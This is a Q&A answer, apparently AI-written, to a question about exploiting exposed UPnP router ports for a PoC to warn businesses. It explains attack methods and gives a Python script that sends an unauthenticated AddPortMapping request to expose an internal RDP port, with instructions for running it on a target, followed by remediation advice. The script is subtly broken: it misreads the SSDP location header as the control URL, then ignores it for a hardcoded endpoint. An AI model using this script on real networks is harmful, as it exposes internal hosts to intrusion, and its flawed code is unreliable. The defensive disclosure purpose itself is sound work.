开放UPnP端口是否可被利用?如何利用?需POC用于告知企业
Hey there! Since you're totally new to cybersecurity, let's break this down in plain terms without all the confusing jargon. First, let's cover what you're dealing with here, then the risks, how attackers might exploit it, and a proof-of-concept (POC) you can use to demonstrate the issue to affected businesses.
1. What's the Actual Risk of an Open UPnP Port?
First, a quick recap: UPnP (Universal Plug and Play) is designed to make devices on a network automatically connect and configure port mappings without manual setup. The problem? If the router's UPnP service is exposed to the public internet (which sounds like what you found), it often lacks proper authentication checks.
This means an attacker can:
- Expose internal services (like RDP, SSH, or even surveillance cameras) to the public internet by adding malicious port mappings
- Tamper with router settings (like changing DNS servers to redirect users to phishing sites)
- Enumerate existing port mappings to gather intel on internal devices for further attacks
2. How Attackers Actually Exploit Open UPnP Ports
Here are the most common exploitation methods:
- Unauthorized Port Mapping: Send a malicious UPnP
AddPortMappingrequest to the router, specifying an external port to map to an internal device's port (e.g., map public port 3389 to an internal PC's RDP port). - Configuration Tampering: Use UPnP requests to modify router settings—like swapping the default DNS server for a malicious one that redirects traffic to fake login pages.
- Information Gathering: Use UPnP's
GetGenericPortMappingEntryrequest to list all existing port mappings, giving attackers a blueprint of the internal network's exposed services.
3. Proof-of-Concept (POC) Script
This Python script demonstrates how an unauthorized port mapping can be added to a vulnerable router. Critical Note: Only run this on devices you have explicit permission to test—unauthorized testing is illegal and unethical.
import socket import xml.etree.ElementTree as ET import http.client def upnp_add_port_mapping(router_ip, external_port, internal_ip, internal_port, protocol="TCP"): # First, try to discover the UPnP control URL via SSDP sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) ssdp_request = ( "M-SEARCH * HTTP/1.1\r\n" "HOST: 239.255.255.250:1900\r\n" "MAN: \"ssdp:discover\"\r\n" "MX: 3\r\n" "ST: urn:schemas-upnp-org:service:WANIPConnection:1\r\n\r\n" ) sock.sendto(ssdp_request.encode(), ("239.255.255.250", 1900)) control_url = f"http://{router_ip}:5000/ctl/IPConn" try: response, _ = sock.recvfrom(4096) for line in response.decode().split("\r\n"): if line.startswith("LOCATION:"): control_url = line.split(":", 1)[1].strip() break except socket.timeout: print("UPnP discovery timed out—falling back to default control URL") # Build the SOAP request to add a port mapping soap_envelope = f"""<?xml version="1.0" encoding="utf-8"?> <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <s:Body> <u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"> <NewRemoteHost></NewRemoteHost> <NewExternalPort>{external_port}</NewExternalPort> <NewProtocol>{protocol}</NewProtocol> <NewInternalPort>{internal_port}</NewInternalPort> <NewInternalClient>{internal_ip}</NewInternalClient> <NewEnabled>1</NewEnabled> <NewPortMappingDescription>POC Security Test</NewPortMappingDescription> <NewLeaseDuration>3600</NewLeaseDuration> </u:AddPortMapping> </s:Body> </s:Envelope>""" # Send the request to the router conn = http.client.HTTPConnection(router_ip, 5000) conn.request( "POST", "/ctl/IPConn", soap_envelope, headers={ "Content-Type": "text/xml; charset=utf-8", "SOAPAction": '"urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping"' } ) response = conn.getresponse() if response.status == 200: print(f"✅ Successfully added port mapping: Public {external_port} -> Internal {internal_ip}:{internal_port}") else: print(f"❌ Failed to add mapping. Status code: {response.status}, Reason: {response.reason}") conn.close() # Example usage (UNCOMMENT ONLY FOR AUTHORIZED TESTING) # upnp_add_port_mapping("192.168.1.1", 8080, "192.168.1.100", 3389)
How to Use This POC
- Replace the example IPs/ports with the target router's details and an internal device you want to test mapping to.
- Run the script—if it succeeds, that means the router's UPnP service is vulnerable to unauthorized port mapping.
- Make sure to remove the test port mapping after demonstrating the issue!
4. Recommendations for the Affected Business
When you share this with the enterprise, include these actionable steps:
- Disable UPnP if not needed: Most businesses don't require UPnP for their operations—turning it off eliminates the risk entirely.
- Update router firmware: Manufacturers often release patches for UPnP vulnerabilities—ensure the router is running the latest version.
- Restrict UPnP access: If UPnP is necessary, configure the router to only allow UPnP requests from trusted internal IP ranges.
- Regularly scan for open UPnP ports: Use network scanning tools to detect exposed UPnP services across the network.
内容的提问来源于stack exchange,提问作者Afif Malghani

